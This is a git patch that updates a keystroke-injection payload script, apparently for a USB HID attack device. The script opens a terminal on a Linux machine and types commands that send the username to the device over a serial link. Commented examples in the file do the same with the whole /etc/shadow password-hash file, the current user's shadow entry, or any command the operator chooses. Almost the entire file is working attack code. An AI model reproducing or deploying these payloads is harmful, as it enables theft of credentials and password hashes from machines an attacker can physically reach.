From d8e90f2f70fd7be548a9b16e61b2078cb667adeb Mon Sep 17 00:00:00 2001 From: Corey Harding Date: Sat, 28 Oct 2017 20:07:29 -0400 Subject: [PATCH] Update Payload LinSerialEXFIL --- payloads/LinSerialEXFIL.txt | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt index 6ad3700..5bd0f15 100644 --- a/payloads/LinSerialEXFIL.txt +++ b/payloads/LinSerialEXFIL.txt @@ -1,13 +1,15 @@ Rem: Exfiltrate UserName from Linux Box using a Serial Link -DefaultDelay:1000 +DefaultDelay:50 Press:134+195 +CustomDelay:1000 PrintLine:gnome-terminal CustomDelay:1000 -Rem: Exfiltrate Username then BlinkLED:3 to signal when done exfiltrating data -PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad*;echo "BlinkLED:3" > /dev/serial/by-id/*LilyPad* & +Rem: Exfiltrate User and BlinkLED:3 when done +PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(whoami)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad* +Rem: - Rem: More examples below Rem: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad* -Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(LINUX COMMAND HERE) > /dev/serial/by-id/*LilyPad* -Rem: Dump shadow file: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow) > /dev/serial/by-id/*LilyPad* +Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(LINUX COMMAND HERE)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad* +Rem: Dump shadow file: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(cat /etc/shadow)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad* Rem: Dump shadow file for current user: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow|grep $(whoami)) > /dev/serial/by-id/*LilyPad* Rem: Another way to access device: PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0 \ No newline at end of file